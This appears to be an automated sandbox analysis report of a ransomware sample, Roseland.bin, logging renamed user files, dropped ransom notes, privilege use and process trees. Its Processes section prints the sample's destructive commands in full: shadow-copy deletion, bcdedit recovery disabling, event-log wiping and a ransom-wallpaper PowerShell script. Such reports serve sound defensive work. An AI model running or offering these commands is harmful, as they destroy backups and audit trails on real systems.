Malware Analysis Report

2024-10-16 03:28

Sample ID 230113-lcgmxsfh22
Target Roseland.bin
SHA256 bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705
Tags
evasion ransomware
score
9/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
9/10

SHA256

bff12a83b1fc2e0ad0000ad9b68abc8eada559bb1094caaf5b9f52887df23705

Threat Level: Likely malicious

The file Roseland.bin was found to be: Likely malicious.

Malicious Activity Summary

evasion ransomware

Deletes shadow copies

Modifies boot configuration data using bcdedit

Modifies extensions of user files

Drops desktop.ini file(s)

Enumerates connected drives

Sets desktop wallpaper using registry

Drops file in Program Files directory

Interacts with shadow copies

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-13 09:23

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-13 09:23

Reported

2023-01-13 09:25

Platform

win7-20221111-en

Max time kernel

54s

Max time network

34s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

Signatures

Deletes shadow copies

ransomware

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Modifies extensions of user files

ransomware
Description Indicator Process Target
File opened for modification C:\Users\Admin\Pictures\TestEnter.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\DenyOpen.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\NewConvertTo.tif => C:\Users\Admin\Pictures\NewConvertTo.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\ResetSend.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\ResetSend.tiff => C:\Users\Admin\Pictures\ResetSend.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\WatchPublish.tiff => C:\Users\Admin\Pictures\WatchPublish.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\BackupSet.raw => C:\Users\Admin\Pictures\BackupSet.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\PushSend.tif => C:\Users\Admin\Pictures\PushSend.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\GroupConfirm.crw => C:\Users\Admin\Pictures\GroupConfirm.crw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Users\Admin\Pictures\WatchPublish.tiff C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\UninstallConnect.tif => C:\Users\Admin\Pictures\UninstallConnect.tif.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\CompareAdd.raw => C:\Users\Admin\Pictures\CompareAdd.raw.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DisableHide.png => C:\Users\Admin\Pictures\DisableHide.png.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\DenyOpen.tiff => C:\Users\Admin\Pictures\DenyOpen.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File renamed C:\Users\Admin\Pictures\TestEnter.tiff => C:\Users\Admin\Pictures\TestEnter.tiff.avos2 C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3385717845-2518323428-350143044-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1715839980.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\images\bPrev.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Games\Chess\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\eclipse.inf C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\shadowonlyframe_videoinset.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690Nmerical.XSL C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Media Player\en-US\wmlaunch.exe.mui C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Algiers C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\css\RSSFeeds.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\FormsTemplates\POLICIES.FDT C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0145168.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\WindowsMedia.mpp C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\ja-JP\gadget.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\boot_ja.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\shatter.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\MEDIA\DRUMROLL.WAV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01566_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_few-showers.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Lime.css C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO02439_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Common Files\microsoft shared\VSTA\8.0\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\North_Dakota\Beulah C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-jvm.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Concourse.thmx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0240189.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\es-ES\RSSFeeds.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Sports\GoldRing.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Microsoft Games\Mahjong\es-ES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Calendar.Gadget\drag.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198016.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\TN00241_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.cer C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\DenyPop.xht C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Mazatlan C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Perth C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\New_York C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\ja-JP\js\highDpiImageSwap.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382925.JPG C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01157_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-uisupport.xml C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDEBARBB.DPV C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\YAHOO.COM.SG.XML C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR39F.GIF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Australia\Darwin C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.security_1.2.0.v20130424-1801.jar C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\hr\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nassau C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\gifs\index.gif C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\MEIPreload\preloaded_data.pb C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_gray_thunderstorm.png C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\currency.html C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OneNote\SendToOneNote.gpd C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File created C:\Program Files (x86)\Google\Policies\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\localizedStrings.js C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
File opened for modification C:\Program Files\7-Zip\Lang\ext.txt C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1736 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 620 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1456 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1820 wrote to memory of 1264 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\system32\cmd.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1632 wrote to memory of 1180 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1736 wrote to memory of 692 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1456 wrote to memory of 380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 620 wrote to memory of 1068 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1264 wrote to memory of 2388 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1820 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\Roseland.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2964 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 2876 wrote to memory of 2976 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Roseland.exe

"C:\Users\Admin\AppData\Local\Temp\Roseland.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

